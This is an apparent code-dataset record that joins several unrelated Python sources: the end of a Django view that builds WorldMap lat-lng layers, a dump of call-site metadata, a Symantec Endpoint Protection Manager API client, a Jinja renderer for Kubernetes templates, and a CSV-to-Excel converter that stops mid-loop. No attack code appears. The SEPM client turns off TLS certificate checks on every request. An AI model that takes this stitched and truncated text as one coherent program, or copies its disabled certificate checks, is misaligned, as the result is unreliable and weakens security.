        json_msg = MessageHelperJSON.get_json_fail_msg(\
                'Sorry! ' + worldmap_data_or_err_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
    # -----------------------------------------
    # Succeeded! Create a WorldMapTabularLayerInfo object
    # (on success the second element is a (user_msg, response_data) pair)
    # -----------------------------------------
    user_msg, response_data = worldmap_data_or_err_msg
    #json_msg = MessageHelperJSON.get_json_success_msg(user_msg, data_dict=response_data)
    #return HttpResponse(json_msg, content_type="application/json", status=200)
    worldmap_latlng_info = WorldMapTabularLayerInfo.build_from_worldmap_json(tabular_info,\
                                response_data)
    if worldmap_latlng_info is None:
        # build_from_worldmap_json returned None: log and report error s4.
        LOGGER.error("Failed to create WorldMapLatLngInfo using data: %s",\
            response_data)
        user_msg = 'Sorry! Failed to create map. Please try again. (code: s4)'
        json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
    # -----------------------------------------
    # Notify Dataverse of the new map
    # (runs in a separate process via popen)
    # -----------------------------------------
    MetadataUpdater.run_update_via_popen(worldmap_latlng_info)
    # -----------------------------------------
    # Possible that this failed?
    # Make sure at least 1 row mapped
    # -----------------------------------------
    # Skip for now!  Error in row counts for Lat/Lng!
    # NOTE: the triple-quoted block below is deliberately disabled code,
    # kept for reference (it is a bare string statement, not executed logic).
    """
    if worldmap_latlng_info.did_any_rows_map() is False:
        # Delete the worldmap_latlng_info object
        worldmap_latlng_info.delete()
        # Send back a user error message
        user_msg = "Sorry! We couldn't map any of those latitude and longitude values."
        return HttpResponse(MessageHelperJSON.get_json_fail_msg(user_msg),\
            content_type="application/json",\
            status=200)
    """
    # -----------------------------------------
    # Build the Map HTML chunk to replace the form
    # -----------------------------------------
    map_html, user_message_html = build_map_html(request, worldmap_latlng_info)
    if map_html is None:    # Failed!  Send an error (code s5)
        LOGGER.error("Failed to create map HTML using WorldMapLatLngInfo: %s (%d)",\
                worldmap_latlng_info, worldmap_latlng_info.id)
        user_msg = 'Sorry! Failed to create map. Please try again. (code: s5)'
        json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
        return HttpResponse(json_msg, content_type="application/json", status=200)
    # -----------------------------------------
    # Looks good.  In the JSON response, send
    # back the map HTML
    # -----------------------------------------
    data_dict = dict(map_html=map_html,
                    user_message_html=user_message_html,
                    id_main_panel_title=PANEL_TITLE_STYLE_MAP)
    json_msg = MessageHelperJSON.get_json_success_msg("great job", data_dict=data_dict)
    return HttpResponse(json_msg, content_type="application/json", status=200)
| [
"logging.getLogger",
"gc_apps.gis_tabular.models.WorldMapTabularLayerInfo.build_from_worldmap_json",
"gc_apps.dv_notify.metadata_updater.MetadataUpdater.run_update_via_popen",
"gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_success_msg",
"gc_apps.gis_tabular.forms.ChooseSingleColumnForm",
... | [((1230, 1257), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1247, 1257), False, 'import logging\n'), ((2427, 2462), 'gc_apps.worldmap_connect.utils.get_geocode_types_and_join_layers', 'get_geocode_types_and_join_layers', ([], {}), '()\n', (2460, 2462), False, 'from gc_apps.worldmap_connect.utils import get_geocode_types_and_join_layers\n'), ((2628, 2736), 'gc_apps.gis_tabular.forms.ChooseSingleColumnForm', 'ChooseSingleColumnForm', (['tabular_info.id', 'available_layers_list', 'tabular_info.column_names', 'request.POST'], {}), '(tabular_info.id, available_layers_list, tabular_info\n .column_names, request.POST)\n', (2650, 2736), False, 'from gc_apps.gis_tabular.forms import LatLngColumnsForm, ChooseSingleColumnForm\n'), ((3404, 3441), 'gc_apps.gis_basic_file.dataverse_info_service.get_dataverse_info_dict', 'get_dataverse_info_dict', (['tabular_info'], {}), '(tabular_info)\n', (3427, 3441), False, 'from gc_apps.gis_basic_file.dataverse_info_service import get_dataverse_info_dict\n'), ((3927, 3955), 'gc_apps.geo_utils.msg_util.msg', 'msg', (["('success: %s' % success)"], {}), "('success: %s' % success)\n", (3930, 3955), False, 'from gc_apps.geo_utils.msg_util import msg, msgt\n'), ((5051, 5110), 'gc_apps.dv_notify.metadata_updater.MetadataUpdater.run_update_via_popen', 'MetadataUpdater.run_update_via_popen', (['worldmap_tabular_info'], {}), '(worldmap_tabular_info)\n', (5087, 5110), False, 'from gc_apps.dv_notify.metadata_updater import MetadataUpdater\n'), ((5293, 5339), 'gc_apps.gis_tabular.views.build_map_html', 'build_map_html', (['request', 'worldmap_tabular_info'], {}), '(request, worldmap_tabular_info)\n', (5307, 5339), False, 'from gc_apps.gis_tabular.views import build_map_html\n'), ((6109, 6181), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_success_msg', 'MessageHelperJSON.get_json_success_msg', (['"""great job"""'], {'data_dict': 'data_dict'}), "('great job', data_dict=data_dict)\n", (6147, 
6181), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((6194, 6261), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (6206, 6261), False, 'from django.http import HttpResponse\n'), ((7162, 7237), 'gc_apps.gis_tabular.forms.LatLngColumnsForm', 'LatLngColumnsForm', (['tabular_info.id', 'tabular_info.column_names', 'request.POST'], {}), '(tabular_info.id, tabular_info.column_names, request.POST)\n', (7179, 7237), False, 'from gc_apps.gis_tabular.forms import LatLngColumnsForm, ChooseSingleColumnForm\n'), ((8713, 8791), 'gc_apps.gis_tabular.models.WorldMapTabularLayerInfo.build_from_worldmap_json', 'WorldMapTabularLayerInfo.build_from_worldmap_json', (['tabular_info', 'response_data'], {}), '(tabular_info, response_data)\n', (8762, 8791), False, 'from gc_apps.gis_tabular.models import WorldMapTabularLayerInfo\n'), ((9337, 9395), 'gc_apps.dv_notify.metadata_updater.MetadataUpdater.run_update_via_popen', 'MetadataUpdater.run_update_via_popen', (['worldmap_latlng_info'], {}), '(worldmap_latlng_info)\n', (9373, 9395), False, 'from gc_apps.dv_notify.metadata_updater import MetadataUpdater\n'), ((10244, 10289), 'gc_apps.gis_tabular.views.build_map_html', 'build_map_html', (['request', 'worldmap_latlng_info'], {}), '(request, worldmap_latlng_info)\n', (10258, 10289), False, 'from gc_apps.gis_tabular.views import build_map_html\n'), ((11052, 11124), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_success_msg', 'MessageHelperJSON.get_json_success_msg', (['"""great job"""'], {'data_dict': 'data_dict'}), "('great job', data_dict=data_dict)\n", (11090, 11124), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((11137, 11204), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': 
'"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (11149, 11204), False, 'from django.http import HttpResponse\n'), ((1756, 1808), 'gc_apps.gis_tabular.models.TabularFileInfo.objects.get', 'TabularFileInfo.objects.get', ([], {'pk': 'tabular_file_info_id'}), '(pk=tabular_file_info_id)\n', (1783, 1808), False, 'from gc_apps.gis_tabular.models import TabularFileInfo\n'), ((3119, 3186), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (3131, 3186), False, 'from django.http import HttpResponse\n'), ((4103, 4134), 'gc_apps.geo_utils.msg_util.msg', 'msg', (["('error msg: %s' % json_msg)"], {}), "('error msg: %s' % json_msg)\n", (4106, 4134), False, 'from gc_apps.geo_utils.msg_util import msg, msgt\n'), ((4150, 4217), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (4162, 4217), False, 'from django.http import HttpResponse\n'), ((4783, 4828), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (4818, 4828), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((4844, 4911), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (4856, 4911), False, 'from django.http import HttpResponse\n'), ((5643, 5688), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (5678, 5688), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), 
((5704, 5771), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (5716, 5771), False, 'from django.http import HttpResponse\n'), ((6740, 6792), 'gc_apps.gis_tabular.models.TabularFileInfo.objects.get', 'TabularFileInfo.objects.get', ([], {'pk': 'tabular_file_info_id'}), '(pk=tabular_file_info_id)\n', (6767, 6792), False, 'from gc_apps.gis_tabular.models import TabularFileInfo\n'), ((7621, 7688), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (7633, 7688), False, 'from django.http import HttpResponse\n'), ((8128, 8201), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (["('Sorry! ' + worldmap_data_or_err_msg)"], {}), "('Sorry! ' + worldmap_data_or_err_msg)\n", (8163, 8201), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((8235, 8302), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (8247, 8302), False, 'from django.http import HttpResponse\n'), ((9068, 9113), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (9103, 9113), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((9129, 9196), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (9141, 9196), False, 'from django.http import HttpResponse\n'), ((10585, 10630), 
'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (10620, 10630), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((10646, 10713), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (10658, 10713), False, 'from django.http import HttpResponse\n'), ((1951, 1995), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['err_msg'], {}), '(err_msg)\n', (1986, 1995), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((2011, 2078), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (2023, 2078), False, 'from django.http import HttpResponse\n'), ((3047, 3102), 'gc_apps.geo_utils.message_helper_json.format_errors_as_text', 'format_errors_as_text', (['form_single_column'], {'for_web': '(True)'}), '(form_single_column, for_web=True)\n', (3068, 3102), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((6935, 6979), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['err_msg'], {}), '(err_msg)\n', (6970, 6979), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((6995, 7062), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (7007, 7062), False, 'from django.http import HttpResponse\n'), ((7401, 7450), 
'gc_apps.geo_utils.message_helper_json.format_errors_as_text', 'format_errors_as_text', (['form_lat_lng'], {'for_web': '(True)'}), '(form_lat_lng, for_web=True)\n', (7422, 7450), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
py_sep_sdk - Symantec Endpoint Protection Manager API Client Library
Copyright (C) 2019 <NAME> @greenpau
See LICENSE for licensing details
'''
from __future__ import (absolute_import, division, print_function)
import logging
import json
import requests
import urllib3
import py_sep_sdk.config as config
# Suppress urllib3's InsecureRequestWarning noise: every request below is
# issued with verify=False against the SEPM server.
urllib3.disable_warnings()
class Client(object):
    '''
    This class implements an API client for Symantec Endpoint Protection Manager API.
    '''

    # Python 2 has both ``str`` and ``unicode``; Python 3 has only ``str``.
    # Referencing ``unicode`` directly raised NameError on Python 3, so the
    # compatible text-type tuple is resolved once at class-definition time.
    try:
        _TEXT_TYPES = (str, unicode)  # noqa: F821 -- Python 2
    except NameError:
        _TEXT_TYPES = (str,)  # Python 3

    def __init__(self):
        ''' Initializes the class. '''
        self.log = logging.getLogger('sepm-client')
        handler = logging.StreamHandler()
        formatter = logging.Formatter('[%(asctime)s] %(levelname)s %(name)s@%(lineno)d: %(message)s')
        handler.setFormatter(formatter)
        self.log.addHandler(handler)
        self.host = None
        self.debug_enabled = False
        self.config = config.ClientConfiguration()
        self.session = requests.Session()
        self.headers = {
            "Accept-Charset": "utf-8",
            "Accept-Encoding": "gzip, deflate, compress",
            "Accept": "*/*",
        }
        self.is_authenticated = False
        return

    def debug(self):
        ''' Enables debugging of the class (and of its configuration). '''
        self.log.setLevel(logging.DEBUG)
        self.debug_enabled = True
        self.config.log.setLevel(logging.DEBUG)
        self.config.debug_enabled = True
        return

    def delete_agent(self, agent_id=None, fmt='json'):
        ''' Delete an agent (computer) by its 32-character id.

        Returns a dict with the HTTP status ``code`` and a human-readable
        ``message``. Raises on a missing or malformed ``agent_id``.
        ``fmt`` is accepted for interface compatibility and is unused.
        '''
        if not agent_id:
            raise Exception('client', 'failed to delete an agent because id is empty')
        if agent_id == '':
            raise Exception('client', 'failed to delete an agent because id is empty')
        if len(agent_id) != 32:
            raise Exception('client', 'failed to delete an agent because id is unsupported, not len(32)')
        self.authenticate()
        url = '%s/computers/%s' % (self.config.get('url'), agent_id.lower())
        req = self.session.delete(url, headers=self.headers, verify=False)
        response = {
            'code': req.status_code,
        }
        # Map documented SEPM status codes to their documented meanings;
        # fall back to the raw response body for anything else.
        if req.status_code == 400:
            response['message'] = 'The parameters are invalid.'
        elif req.status_code == 401:
            response['message'] = 'The user that is currently logged on has insufficient rights to execute the web method, or the user is unauthorized.'
        elif req.status_code == 410:
            response['message'] = 'Cannot find the specified object.'
        elif req.status_code == 500:
            response['message'] = 'The web service encountered an error while processing the web request.'
        elif req.status_code == 204:
            response['message'] = 'The resource was deleted. If the resource did not exist prior to the call, 204 is still returned.'
        else:
            response['message'] = req.text
        return response

    def set_host(self, host):
        ''' Sets API server host. '''
        self.host = host
        return

    def get_version(self):
        ''' Connect to API server and retrieve version information.

        Also caches the values in ``self.config.settings`` under
        ``manager_*`` keys. Returns a dict of version/api_sequence/api_version.
        '''
        url = '%s/version' % (self.config.get('url'))
        req = self.session.get(url, headers=self.headers, verify=False)
        if req.status_code != 200:
            raise Exception('client', 'url: %s, %s: %s' % (url, req.status_code, req.text))
        data = json.loads(req.text)
        manager = {}
        for key in ['version', 'API_SEQUENCE', 'API_VERSION']:
            if key not in data:
                raise Exception('client', "key '%s' is not part of the response" % (key))
            self.config.settings['manager_' + key.lower()] = str(data[key])
            manager[key.lower()] = str(data[key])
        return manager

    def get_user_session(self):
        ''' Return True if the stored API token grants a valid user session. '''
        if 'api_token' not in self.config.settings:
            self.log.debug('api_token is not in configuration settings')
            return False
        self.headers['Authorization'] = 'Bearer %s' % (self.config.settings['api_token'])
        self.log.debug('attempting accessing current user session with %s token' % (self.config.settings['api_token']))
        url = '%s/sessions/currentuser' % (self.config.get('url'))
        req = self.session.get(url, headers=self.headers, verify=False)
        if req.status_code != 200:
            self.log.debug('url: %s, %s: %s' % (url, req.status_code, req.text))
            return False
        data = json.loads(req.text)
        self.log.debug('%s' % (data))
        return True

    def _get_items(self, item=None):
        ''' Perform paged GET requests for *item* and return a dict keyed by
        each entry's unique id (endpoint-specific: agentId, serialNumber, id).
        '''
        self.authenticate()
        mandatory_response_keys = [
            'content',
            'firstPage',
            'lastPage',
            'totalPages'
        ]
        items = []
        page_counter = 0
        while True:
            page_counter += 1
            url = '%s/%s' % (self.config.get('url'), item)
            params = {}
            params['pageSize'] = 500
            params['pageIndex'] = page_counter
            self.log.debug('GET %s with params: %s', url, params)
            req = self.session.get(url, headers=self.headers, params=params, verify=False)
            if req.status_code != 200:
                raise Exception('client',
                    '%d: %s, message: %s' % (req.status_code, req.reason, req.text))
            data = json.loads(req.text)
            # These endpoints return a flat JSON list instead of a paged map.
            if item in ['domains', 'licenses', 'admin-users']:
                items.extend(data)
                break
            for key in mandatory_response_keys:
                if key not in data:
                    raise Exception('client', "key '%s' is not in response" % (key))
            items.extend(data['content'])
            if data['lastPage'] is True:
                break
            if page_counter > 100:
                # safety valve against endless pagination
                break
        response = {}
        uuid = 'id'
        uuid_map = {
            'computers': 'agentId',
            'licenses': 'serialNumber'
        }
        if item in uuid_map:
            uuid = uuid_map[item]
        for entry in items:
            if uuid in entry:
                for f in ['computerName', 'loginDomain', 'logonUserName', 'domainOrWorkgroup']:
                    if f in entry:
                        if isinstance(entry[f], self._TEXT_TYPES):
                            # Lowercase text fields. The former
                            # str(x.encode('utf-8')) produced "b'...'" strings
                            # on Python 3.
                            entry[f] = entry[f].lower()
                response[entry[uuid]] = entry
        response = self._remove_unicode(response)
        return response

    def get_domains(self):
        ''' Get a list of domains. '''
        return self._get_items('domains')

    def get_groups(self):
        ''' Get a list of groups. '''
        return self._get_items('groups')

    def get_computers(self):
        ''' Get a list of computers. '''
        return self._get_items('computers')

    def get_licenses(self):
        ''' Get a list of licenses. '''
        return self._get_items('licenses')

    def get_policies(self):
        ''' Get a list of policies. '''
        return self._get_items('policies/summary')

    def get_admin_users(self):
        ''' Get a list of admin users. '''
        return self._get_items('admin-users')

    def authenticate(self):
        ''' Handle authentication; caches the bearer token on success. '''
        if self.get_user_session():
            self.is_authenticated = True
        if not self.is_authenticated:
            url = '%s/identity/authenticate' % (self.config.get('url'))
            payload = {
                "username": self.config.settings['username'],
                "password": self.config.settings['password'],
                "domain": "",
            }
            req = self.session.post(url, json=payload, verify=False)
            if req.status_code != 200:
                raise Exception('client',
                    '%d: %s, message: %s' % (req.status_code, req.reason, req.text))
            data = json.loads(req.text)
            if 'token' not in data:
                raise Exception('client', 'authentication response has no token')
            self.config.settings['api_token'] = str(data['token'])
            for k in data:
                self.config.settings['api_' + str(k)] = data[k]
            self.headers['Authorization'] = 'Bearer %s' % (data['token'])
            self.log.debug('writing token %s to %s' % (self.config.settings['api_token'], self.config.settings['api_token_file']))
            with open(self.config.settings['api_token_file'], "w") as token_file:
                token_file.write(self.config.settings['api_token'])
            self.is_authenticated = True
        return

    def _remove_unicode(self, data):
        ''' Recursively convert unicode text in *data* to plain ``str``.

        On Python 3 all text is already ``str`` so this is effectively an
        identity transform; on Python 2 it coerces ``unicode`` values,
        replacing typographic quotes that cannot be ASCII-encoded.
        '''
        if isinstance(data, dict):
            new_data = {}
            for k in data:
                # only text keys are normalised; other key types pass through
                if isinstance(k, self._TEXT_TYPES):
                    new_data[str(k)] = self._remove_unicode(data[k])
                else:
                    new_data[k] = self._remove_unicode(data[k])
            return new_data
        if isinstance(data, list):
            new_data = []
            for entry in data:
                new_data.append(self._remove_unicode(entry))
            return new_data
        if isinstance(data, self._TEXT_TYPES):
            try:
                return str(data)
            except UnicodeEncodeError:
                # Python 2: strip typographic single quotes and retry
                return str(data.replace(u"\u2018", "'").replace(u"\u2019", "'"))
        return data
def new_client():
    '''
    Factory helper: build and return a fresh Client instance.
    '''
    client = Client()
    return client
| [
"logging.getLogger",
"json.loads",
"logging.StreamHandler",
"requests.Session",
"logging.Formatter",
"py_sep_sdk.config.ClientConfiguration",
"urllib3.disable_warnings"
] | [((356, 382), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\n', (380, 382), False, 'import urllib3\n'), ((591, 623), 'logging.getLogger', 'logging.getLogger', (['"""sepm-client"""'], {}), "('sepm-client')\n", (608, 623), False, 'import logging\n'), ((642, 665), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (663, 665), False, 'import logging\n'), ((686, 772), 'logging.Formatter', 'logging.Formatter', (['"""[%(asctime)s] %(levelname)s %(name)s@%(lineno)d: %(message)s"""'], {}), "(\n '[%(asctime)s] %(levelname)s %(name)s@%(lineno)d: %(message)s')\n", (703, 772), False, 'import logging\n'), ((927, 955), 'py_sep_sdk.config.ClientConfiguration', 'config.ClientConfiguration', ([], {}), '()\n', (953, 955), True, 'import py_sep_sdk.config as config\n'), ((979, 997), 'requests.Session', 'requests.Session', ([], {}), '()\n', (995, 997), False, 'import requests\n'), ((3399, 3419), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (3409, 3419), False, 'import json\n'), ((4549, 4569), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (4559, 4569), False, 'import json\n'), ((5490, 5510), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (5500, 5510), False, 'import json\n'), ((8021, 8041), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (8031, 8041), False, 'import json\n')] |
"""
Render k8s templates from NIST format
"""
import sys
from os.path import abspath, dirname, join, normpath, isdir, isfile
from jinja2 import (Template,
Environment,
PackageLoader,
select_autoescape)
# Directory containing this module; anchors the relative paths below.
CURRENT_DIR = dirname(abspath(__file__))
# adding this path for the PackageLoader
sys.path.append(dirname(CURRENT_DIR))
#TEMPLATES_DIR = join(CURRENT_DIR, 'templates')
# Rendered templates are written here by TemplateRenderHelper.
OUTPUT_DIR = join(CURRENT_DIR, 'output')
class TemplateRenderHelper(object):
    """Render a Jinja2 template from the 'kube_templates' package and write
    the result into OUTPUT_DIR. Rendering happens immediately on init."""

    def __init__(self, template_dict, template_name, rendered_filename):
        """Set up the Jinja2 environment and render right away.

        template_dict: context variables for the template
        template_name: template file name inside the package's templates dir
        rendered_filename: output file name (written under OUTPUT_DIR)
        """
        self.jinja_env = Environment(
            loader=PackageLoader('kube_templates', 'templates'),
            autoescape=select_autoescape(['html', 'xml']))
        self.render_template(template_dict,
                             template_name,
                             rendered_filename)

    def render_template(self, template_dict, template_name, rendered_filename):
        """Render *template_name* with *template_dict* and write it to the
        output directory."""
        assert template_dict, 'template_dict cannot be None'
        template = self.jinja_env.get_template(template_name)
        # create content
        #
        content = template.render(template_dict)
        # write file out -- context manager guarantees the handle is closed
        # (the previous open(...).write(...) leaked the file object)
        #
        rendered_filepath = join(OUTPUT_DIR, rendered_filename)
        with open(rendered_filepath, 'w') as out_file:
            out_file.write(content)
        print('-' * 40)
        print('template written: %s' % rendered_filepath)
        print('-' * 40)
if __name__ == '__main__':
    # Example invocation: render the TwoRavens TA3/TA2 test pod spec.
    template_vars = {
        'eval_id': 'ravens',
        'path_to_dataroot': 'subpath_to_dataroot',
        'path_to_outputs': 'subpath_to_outputs',
        'command': 'ta3_search',
        'command_args': 'command_args',
    }
    #template_name = 'nist-orig-template.yml'
    #template_name = 'ravens-template-02.yml'
    template_name = 'ravens-ta2test-01.yml'
    output_file = 'tworavens_ta3ta2_test_pod.yml'
    renderer = TemplateRenderHelper(template_vars, template_name, output_file)
| [
"os.path.join",
"os.path.dirname",
"jinja2.select_autoescape",
"os.path.abspath",
"jinja2.PackageLoader"
] | [((445, 472), 'os.path.join', 'join', (['CURRENT_DIR', '"""output"""'], {}), "(CURRENT_DIR, 'output')\n", (449, 472), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((285, 302), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (292, 302), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((361, 381), 'os.path.dirname', 'dirname', (['CURRENT_DIR'], {}), '(CURRENT_DIR)\n', (368, 381), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((1348, 1383), 'os.path.join', 'join', (['OUTPUT_DIR', 'rendered_filename'], {}), '(OUTPUT_DIR, rendered_filename)\n', (1352, 1383), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((676, 720), 'jinja2.PackageLoader', 'PackageLoader', (['"""kube_templates"""', '"""templates"""'], {}), "('kube_templates', 'templates')\n", (689, 720), False, 'from jinja2 import Template, Environment, PackageLoader, select_autoescape\n'), ((745, 779), 'jinja2.select_autoescape', 'select_autoescape', (["['html', 'xml']"], {}), "(['html', 'xml'])\n", (762, 779), False, 'from jinja2 import Template, Environment, PackageLoader, select_autoescape\n')] |
#!/usr/bin/env python3
import os
import sys
import argparse
import csv
import re
from dateutil import parser
import datetime
from abc import ABC, abstractmethod
import xlwt
import openpyxl
class Csv2XlsException(Exception):
    """Raised for errors during CSV-to-Excel conversion."""
class ExcelWriter(ABC):
    """Abstract base for the Excel writer backends (.xls / .xlsx).

    Signatures are aligned with the concrete implementations below
    (the previous abstract methods declared extra/missing parameters:
    ``add_sheet(self, wb, name)`` and ``append(self, ws, row)``).
    """

    @abstractmethod
    def add_sheet(self, name):
        """Create and return a new worksheet called *name*."""

    @abstractmethod
    def append(self, worksheet, row, translate_date=False):
        """Append *row* to *worksheet*, optionally coercing date strings."""

    @abstractmethod
    def save(self, filename):
        """Write the workbook to *filename*."""
class XlsWriter(ExcelWriter):
    """ExcelWriter backend producing legacy .xls files via xlwt."""

    # number-format string per exact Python date/time type (datetime is a
    # subclass of date, so exact-type lookup mirrors the original checks)
    _NUM_FORMATS = {
        datetime.datetime: 'yyyy-MM-ddThh:mm:ss.000',
        datetime.time: 'hh:mm:ss.000',
        datetime.date: 'yyyy-MM-dd',
    }

    def __init__(self):
        self.wb = xlwt.Workbook()
        # next row index within the current sheet
        self.row_counter = 0

    def add_sheet(self, name):
        """Start a new sheet named *name*; row numbering restarts at 0."""
        self.row_counter = 0
        return self.wb.add_sheet(sheetname=name)

    @classmethod
    def _make_style(cls, value):
        """Return an XFStyle for date/time *value*, or None for plain cells.

        Extracted to avoid the three near-identical style-construction
        branches of the original implementation.
        """
        fmt = cls._NUM_FORMATS.get(type(value))
        if fmt is None:
            return None
        style = xlwt.XFStyle()
        style.num_format_str = fmt
        return style

    def append(self, worksheet, row, translate_date=False):
        """Write *row* into *worksheet* at the current row index."""
        for col_counter, data in enumerate(row):
            excel_data = parse_data(data, translate_date)
            style = self._make_style(excel_data) if translate_date else None
            if style is not None:
                worksheet.write(self.row_counter, col_counter, excel_data, style)
            else:
                worksheet.write(self.row_counter, col_counter, excel_data)
        self.row_counter += 1

    def save(self, filename):
        """Write the workbook to *filename*."""
        self.wb.save(filename)
class XlsxWriter(ExcelWriter):
    """ExcelWriter backend producing .xlsx files via openpyxl."""

    def __init__(self):
        self.wb = openpyxl.Workbook()
        # openpyxl starts every workbook with one active sheet; reuse it
        # for the first add_sheet() call instead of creating a new one.
        self.has_default_sheet = True

    def add_sheet(self, name):
        """Return a worksheet titled *name* (first call recycles the
        workbook's initial default sheet)."""
        if not self.has_default_sheet:
            return self.wb.create_sheet(title=name)
        self.has_default_sheet = False
        active_sheet = self.wb.active
        active_sheet.title = name
        return active_sheet

    def append(self, worksheet, row, translate_date=False):
        """Append *row* to *worksheet*, converting each cell via parse_data."""
        worksheet.append([parse_data(cell, translate_date) for cell in row])

    def save(self, filename):
        """Write the workbook to *filename*."""
        self.wb.save(filename)
def parse_data(data, translate_date):
    """Coerce a CSV cell string into a float, date/time object, or leave it
    as-is.

    Order of attempts: float first; then, if *translate_date* is true, a
    dateutil parse that is classified as time, date, or datetime depending
    on where a time component appears in the string. Unparseable values are
    returned unchanged.
    """
    try:
        return float(data)
    except ValueError:
        pass
    if translate_date:
        try:
            stripped_data = data.strip()
            dt = parser.parse(stripped_data, ignoretz=True)
            # look for a trailing time component: hh:mm[:ss[.ffffff]].
            # Raw string fixes the invalid '\d' escapes of the original, and
            # the fractional-second separator is now a literal dot (it was an
            # unescaped '.' matching any character).
            m = re.search(r'\d+:[0-5][0-9](:[0-5][0-9](\.\d+)?)?$', stripped_data)
            if m is None:
                # no time found in the string, so only a date
                return datetime.date(dt.year, dt.month, dt.day)
            (time_start_idx, time_end_idx) = m.span()
            if time_start_idx == 0:
                # time starts at index 0: the cell holds only a time-of-day
                return datetime.time(dt.hour, dt.minute, dt.second, dt.microsecond)
            # there is time and something else (maybe date)
            return datetime.datetime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond)
        except ValueError:
            pass
    return data
def read_csv(csv_file):
    """Parse *csv_file* and return every record as a list of string lists."""
    with open(csv_file, 'r', newline='') as handle:
        return list(csv.reader(handle))
def write_excel_from_csv(excel_file, csv_files, translate_date):
    """Convert each CSV file into one sheet of a single Excel workbook.

    The backend is chosen from the target extension: '.xls' uses xlwt,
    anything else uses openpyxl.
    """
    _, extension = os.path.splitext(os.path.basename(excel_file))
    writer = XlsWriter() if extension == '.xls' else XlsxWriter()
    for csv_path in csv_files:
